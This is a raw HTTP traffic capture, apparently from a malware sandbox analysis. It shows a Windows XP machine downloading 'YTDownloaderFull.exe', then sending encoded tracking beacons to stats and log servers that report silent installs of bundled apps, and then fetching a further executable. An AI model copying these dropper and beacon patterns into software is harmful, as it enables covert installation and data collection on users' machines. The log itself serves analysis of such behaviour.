Host: zh9k747-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Date: Sat, 01 Aug 2015 04:17:04 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50
x-amz-request-id: C9E56CCB583C269B
Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT
ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 2000000-2249999/7202374
<<< skipped >>>
GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=2250000-2499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: zh9k747-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Date: Sat, 01 Aug 2015 04:17:04 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50
x-amz-request-id: C9E56CCB583C269B
Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT
ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 2250000-2499999/7202374
<<< skipped >>>
GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=2500000-2749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: zh9k747-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Date: Sat, 01 Aug 2015 04:17:04 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50
x-amz-request-id: C9E56CCB583C269B
Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT
ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 2500000-2749999/7202374
<<< skipped >>>
GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=3000000-3249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: zh9k747-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Date: Sat, 01 Aug 2015 04:17:04 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50
x-amz-request-id: C9E56CCB583C269B
Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT
ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 3000000-3249999/7202374
<<< skipped >>>
GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=3250000-3499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: zh9k747-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Date: Sat, 01 Aug 2015 04:17:05 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50
x-amz-request-id: C9E56CCB583C269B
Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT
ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 3250000-3499999/7202374
<<< skipped >>>
GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=3500000-3749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: zh9k747-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Date: Sat, 01 Aug 2015 04:17:05 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50
x-amz-request-id: C9E56CCB583C269B
Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT
ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 3500000-3749999/7202374
<<< skipped >>>
GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=3750000-3999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: zh9k747-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Date: Sat, 01 Aug 2015 04:17:05 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50
x-amz-request-id: C9E56CCB583C269B
Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT
ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 3750000-3999999/7202374
<<< skipped >>>
GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=4000000-4249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: zh9k747-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Date: Sat, 01 Aug 2015 04:17:05 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50
x-amz-request-id: C9E56CCB583C269B
Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT
ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 4000000-4249999/7202374
<<< skipped >>>
GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=4250000-4499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: zh9k747-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Date: Sat, 01 Aug 2015 04:17:05 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50
x-amz-request-id: C9E56CCB583C269B
Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT
ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 4250000-4499999/7202374
<<< skipped >>>
GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=4500000-4749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: zh9k747-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Date: Sat, 01 Aug 2015 04:17:06 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50
x-amz-request-id: C9E56CCB583C269B
Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT
ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 4500000-4749999/7202374
<<< skipped >>>
GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=4750000-4999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: zh9k747-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Date: Sat, 01 Aug 2015 04:17:06 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50
x-amz-request-id: C9E56CCB583C269B
Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT
ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 4750000-4999999/7202374
<<< skipped >>>
GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=5000000-5249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: zh9k747-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Date: Sat, 01 Aug 2015 04:17:06 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50
x-amz-request-id: C9E56CCB583C269B
Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT
ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 5000000-5249999/7202374
<<< skipped >>>
GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=5250000-5499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: zh9k747-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Date: Sat, 01 Aug 2015 04:17:06 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50
x-amz-request-id: C9E56CCB583C269B
Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT
ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 5250000-5499999/7202374
<<< skipped >>>
GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=5500000-5749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: zh9k747-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Date: Sat, 01 Aug 2015 04:17:06 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50
x-amz-request-id: C9E56CCB583C269B
Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT
ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 5500000-5749999/7202374
<<< skipped >>>
GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=5750000-5999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: zh9k747-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Date: Sat, 01 Aug 2015 04:17:06 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50
x-amz-request-id: C9E56CCB583C269B
Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT
ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 5750000-5999999/7202374
<<< skipped >>>
GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=6000000-6249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: zh9k747-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Date: Sat, 01 Aug 2015 04:17:07 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50
x-amz-request-id: C9E56CCB583C269B
Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT
ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 6000000-6249999/7202374
<<< skipped >>>
GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=6250000-6499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: zh9k747-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Date: Sat, 01 Aug 2015 04:17:07 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50
x-amz-request-id: C9E56CCB583C269B
Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT
ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 6250000-6499999/7202374
<<< skipped >>>
GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=6500000-6749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: zh9k747-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Date: Sat, 01 Aug 2015 04:17:07 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50
x-amz-request-id: C9E56CCB583C269B
Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT
ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 6500000-6749999/7202374
<<< skipped >>>
GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=6750000-6999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: zh9k747-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Date: Sat, 01 Aug 2015 04:17:07 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50
x-amz-request-id: C9E56CCB583C269B
Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT
ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 6750000-6999999/7202374
<<< skipped >>>
GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=7000000-7202373
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: zh9k747-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Date: Sat, 01 Aug 2015 04:17:07 GMT
Content-Type: application/octet-stream
Content-Length: 202374
Connection: keep-alive
x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50
x-amz-request-id: C9E56CCB583C269B
Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT
ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 7000000-7202373/7202374
<<< skipped >>>
GET /monetization.gif?event=3&ibic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&campaign=000803&country=ua&app=70299&os=XP32&defbro=ie&chver=na&ffver=na&iever=&starttime=1438402673&asw=0_1073750528_-2147483648_2048&browser=&rnd=1438402673 HTTP/1.1
Host: logs.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:52 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1438402673.dop003.fr7.t,1438402672.cds021.fr7.c
GIF89a.............,...........D..;
GET /installer.gif?action=started&app=70299&appver=0&ver=1_36_01_22&version_date=15-07-30&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=917D2960B3D84DB6B81D64AD35FD7055PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_90&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&mdat=jSdrW1Q0dDnRMURxifDRVgYdRC8Adht035Oiv/VdBFOgcLKuVjyLkwODo3ELBZAQlAV4wQCv0/3FoAU6Nq4TyNSQ5ULHy4XmM6G655CiyH8WVw44kG0vAaSX5o9UJ3UeFRngKVmGQv7Jq3XE4lhheXPGvgJKRTYLK2GHYcH1gNxWn EAECOB76ieA27Loa1McC07VgrTuDPFJpnvsAq0gBjE7rZg&procstarttime=1438402673&procruntime=7&rnd=1438402680 HTTP/1.1
Host: stats.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: U8ohDIcAYdlVckzLv07ehUBhdal kfdbvzSEabCX2tRnuyDGnlKMtW9NFzA4WaBt
x-amz-request-id: 28149CC588B82845
Date: Sat, 01 Aug 2015 04:17:54 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 14:05:17 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /installer.gif?action=finished&LFMR=NA&app=70299&appver=&ver=1_36_01_22&version_date=15-07-30&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=917D2960B3D84DB6B81D64AD35FD7055PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_90&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1438402673&procruntime=14&rnd=1438402687 HTTP/1.1
Host: stats.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: aHCdkg/HjsRxK0nO58CKY8pe2MNXwTbCpLd56fFzOvaauBdPLxZEgaAlGcnBsp4y
x-amz-request-id: 5D39B52953468ACF
Date: Sat, 01 Aug 2015 04:18:00 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 14:05:17 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /apps.gif?action=install&app=70299&appver=&ver=1_36_01_22&version_date=15-07-30&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=917D2960B3D84DB6B81D64AD35FD7055PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&installtime=1438402673&lifetime=0&silent=1&crtnm=na&procstarttime=1438402673&procruntime=14&rnd=1438402687 HTTP/1.1
Host: stats.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: oCeEaVPimvS0QBBu0dJajO8C74u19GWSej7qGjUUg53RENo6PhH/f3982xZeVpwf
x-amz-request-id: D4F636E3CA61B49C
Date: Sat, 01 Aug 2015 04:18:01 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 14:05:13 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /installer.gif?action=started&app=70881&appver=0&ver=1_36_01_22&version_date=15-07-31&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=96A280AD666E4AB5A58FCCD38A65BDFCPI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_77&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873289&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&mdat=jSdrW1Q0dDnRMURxifDRVgYdRC8Adht035Oiv/VdBFOgcLKuVjyLkwODo3ELBZAQlAV4wQCv0/3FoAU6Nq4TyNSQ5ULHy4XmM6G655CiyH8WVw44kG0vAaSX5o9UJ3UeFRngKVmGQv7Jq3XE4lhheXPGvgJKRTYLK2GHYcH1gNxWn EAECOB76ieA27Loa1McC07VgrTuDPFJpnvsAq0gBjE7rZg&procstarttime=1438402674&procruntime=6&rnd=1438402680 HTTP/1.1
Host: stats.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: igVGuOCz5jkp8sUwrFQMQMS3jUoYaSisgL1xZ5diiddpOC4/XaYDLAKUq/OgcX9kuWghiat2UjE=
x-amz-request-id: 6CA689AE1FEAEC0C
Date: Sat, 01 Aug 2015 04:17:54 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 14:05:17 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /installer.gif?action=finished&LFMR=NA&app=70881&appver=&ver=1_36_01_22&version_date=15-07-31&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=96A280AD666E4AB5A58FCCD38A65BDFCPI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_77&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873289&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1438402674&procruntime=13&rnd=1438402687 HTTP/1.1
Host: stats.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: udIVcVnz5ItAz5GV7iADJVboSMecCIH/XtKIvLZmPNvwHrPy vEfQHaJx7TvXzr3aw/1 FfVNAg=
x-amz-request-id: 0CAD8DF3EF7245E5
Date: Sat, 01 Aug 2015 04:18:00 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 14:05:17 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /apps.gif?action=install&app=70881&appver=&ver=1_36_01_22&version_date=15-07-31&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=96A280AD666E4AB5A58FCCD38A65BDFCPI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&installtime=1438402674&lifetime=0&silent=1&crtnm=na&procstarttime=1438402674&procruntime=13&rnd=1438402687 HTTP/1.1
Host: stats.globalnodemax.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: ORs1KK BLI0jbKxkyJ9sBnq98L7wYzbSmVwDYlftOnFFtsHvPa2EdEQzChgvNHk3zLnK0fVm40o=
x-amz-request-id: 68702ACB6A0591B2
Date: Sat, 01 Aug 2015 04:18:01 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 23 Jun 2015 14:05:13 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /27944.ashx?e=1ZEnpGuz/IQqQvvNc0/QxKGNjjUHyQp W1tgKrNy38lA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIT/NjI/ADPAQQR6/4IivvmRHTUVdycsO/XTfhGZ5Y5ZTQ6SaxLQh/qxWOvghCBTr/XvKbjUyzCCcFAL52sIXt4V mdZi2lOgm uz5FUTyZHqZLRunpF04Gnp31AH4wbxjJRF10/JyN4cjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVei4GUPP3zmQok4Z/T4OvkuHPbyEzOU1sA== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:42 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
GET /27944.ashx?e=LCnUzM5l8JJsK0lFUFVJ7zyMpz1Liwuq0mXIKGF6Fg9XGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRpwoYS2FqOGP2nOUYbNutm /RBYTNv39rKBTIpR gV745zbBYCuaAtAuRQgcEYhwfEYgZF 0Xr0ySxfX6JWT60I15ewo25xH dugxP4Tpn7X9BPEhRyyBD7ADYwDanr6NLtqQCm9ETKWdXr6MSN5TWO9FMoEMJ/sprmNd3ZXUTzY 8NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFaV2a3pWCTy1K5oVP3GqZY3pzYLgoZ4xWNmhyT5r/ybNC1vKV8e/iGN5/nnDBjhbCFLZWhEyhE6oA== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: mpjqoj7o-zxis6jz8.netdna-ssl.com
HTTP/1.1 200 OK
Date: Sat, 01 Aug 2015 04:17:42 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
GET /spdbt/shoppy/snsch7.exe_d HTTP/1.1
